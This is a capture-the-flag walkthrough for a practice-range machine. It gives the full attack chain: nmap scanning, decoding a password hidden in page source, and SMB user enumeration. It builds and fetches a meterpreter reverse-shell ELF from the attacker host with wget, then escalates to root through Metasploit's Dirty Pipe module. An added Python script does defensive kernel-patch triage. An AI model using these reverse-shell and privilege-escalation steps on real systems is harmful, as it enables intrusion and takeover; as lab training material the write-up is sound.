LingJing platform project: https://github.com/414aaj/LingJing

Installation tutorial: (Lingling) LingJing range installation and usage tutorial (Windows and Linux), CSDN blog: https://blog.csdn.net/2301_78519654/article/details/153920708?spm1001.2014.3001.5502

Test environment

Target description: see the image below.

Target IP: 192.168.242.230
Attacker IP: 192.168.188.146

Start by scanning the IP:

    nmap -Pn -O -sV 192.168.242.230

Ports 80, 139, 445, 10000 and 20000 are open.

Inspecting the source of the page on port 80 reveals:

    <!-- dont worry no one will get here, its safe to share with you my access. Its encrypted :) [-]...----..-----------.-----------...-.--------..------------.---------... -->

Running this through an online brainfuck interpreter outputs .2uqPEfj3DPa-3, which is probably a password.

The web services on ports 10000 and 20000 require a username, and trying common usernames got nowhere.

Use enum4linux to enumerate usernames:

    enum4linux 192.168.242.230

When prompted for a password, enter .2uqPEfj3DPa-3. This yields the username cyber.

Log in to the web service on port 20000 with username cyber and password .2uqPEfj3DPa-3. A terminal emulator in the lower-left corner executes commands directly, but not as root, so privilege escalation is needed.

For convenience, msf is used here:

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<reverse port> -f elf -o shell.elf

Serve shell.elf over HTTP:

    python3 -m http.server 8888

In the web page's virtual terminal, run:

    wget http://<attacker IP>:<port>/shell.elf
    chmod +x shell.elf

Start the listener on the attacker machine:

    msfconsole
    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set LHOST 192.168.188.146
    set LPORT 3333
    run
    # run this in the terminal on the web page
    ./shell.elf

The session is established. Now for privilege escalation:

    background
    use post/multi/recon/local_exploit_suggester
    set SESSION 1
    run

Modules reported as usable:

    #  Name                                                     Potentially Vulnerable?  Check Result
    -  ----                                                     -----------------------  ------------
    1  exploit/linux/local/cve_2022_0847_dirtypipe              Yes                      The target appears to be vulnerable. Linux kernel version found: 5.10.0
    2  exploit/linux/local/cve_2022_0995_watch_queue            Yes                      The target appears to be vulnerable. Kernel version 5.10.0 appears to be vulnerable
    3  exploit/linux/local/glibc_tunables_priv_esc              Yes                      The target appears to be vulnerable. The glibc version (2.31-13deb11u2) found on the target appears to be vulnerable
    4  exploit/linux/local/netfilter_nft_set_elem_init_privesc  Yes                      The target appears to be vulnerable. The kernel 5 appears to be vulnerable, but no offsets are available for this version
    5  exploit/linux/local/netfilter_priv_esc_ipv4              Yes                      The target appears to be vulnerable. Target appears to be vulnerable
    6  exploit/linux/local/su_login                             Yes                      The target appears to be vulnerable. Target appears to be vulnerable
    7  exploit/linux/persistence/bash_profile                   Yes                      The service is running, but could not be validated. Bash profile exists and is writable: /home/cyber/.bashrc
    8  exploit/linux/persistence/init_systemd                   Yes                      The target appears to be vulnerable. /tmp/ is writable and system is systemd based
    9  exploit/multi/persistence/cron                           Yes                      The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found

Use the first module, cve_2022_0847:

    use exploit/linux/local/cve_2022_0847_dirtypipe
    set SESSION 1
    set LHOST 192.168.188.146
    set LPORT 7777
    run

Privilege escalation to root succeeds. The two flags are in /home/cyber and /root:

    3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
    3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Summary

Write-ups online say the route for this machine is to use the tar binary in the regular user's directory to read the .old_pass.bak file under /var/backups/. The value read out is Ts4YurgtRX(~h, which is said to work for logging in as the root user, but when I tried it, it did not, so I scanned with msf and escalated privileges that way in the end. Leave a comment if you have any questions.
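
From the defender's side, the suggester's "Linux kernel version found: 5.10.0" is a release-string match, so patch triage needs the real upstream version. The following is an added example, not part of the original post: it classifies a host against the upstream CVE-2022-0847 fix releases (5.10.102, 5.15.25, 5.16.11). The function names, verdict labels and sample strings are constructed for illustration, and the Debian `uname -v` layout is the only vendor format it parses.

```python
import re

# Upstream stable releases that first carried the CVE-2022-0847 fix.
FIXED_IN = {(5, 10): 102, (5, 15): 25, (5, 16): 11}
INTRODUCED = (5, 8)      # first affected mainline series
FIXED_SERIES = (5, 17)   # released series that shipped with the fix


def upstream_version(uname_r, uname_v=""):
    """Return ((major, minor, patch), is_distro_build), or (None, flag).

    Debian puts an ABI name such as 5.10.0-9-amd64 in `uname -r` and the
    real upstream version in `uname -v`, so the latter wins when present.
    """
    m = re.search(r"Debian (\d+)\.(\d+)\.(\d+)", uname_v)
    distro = bool(m) or "-" in uname_r
    m = m or re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        return None, distro
    return tuple(int(g or 0) for g in m.groups()), distro


def dirtypipe_triage(uname_r, uname_v=""):
    """Return 'affected', 'not affected', 'fix included' or 'inconclusive'."""
    ver, distro = upstream_version(uname_r, uname_v)
    if ver is None or re.search(r"-rc\d+", uname_r):
        return "inconclusive"
    series, patch = ver[:2], ver[2]
    if series >= FIXED_SERIES or patch >= FIXED_IN.get(series, float("inf")):
        return "fix included"
    if distro:
        # Vendors backport both features and fixes, so a version below the
        # upstream fix proves nothing: compare the package to the advisory.
        return "inconclusive"
    return "affected" if series >= INTRODUCED else "not affected"


if __name__ == "__main__":
    # Constructed sample strings, not captured from the target in the post.
    samples = [
        ("5.10.0", ""),
        ("5.10.0-9-amd64", "#1 SMP Debian 5.10.70-1 (2021-09-30)"),
        ("5.10.0-21-amd64", "#1 SMP Debian 5.10.162-1 (2023-01-21)"),
    ]
    for r, v in samples:
        print(f"{r!r:20} {v!r:45} -> {dirtypipe_triage(r, v)}")
```

An "inconclusive" verdict means the installed kernel package version has to be compared with the vendor's advisory for CVE-2022-0847.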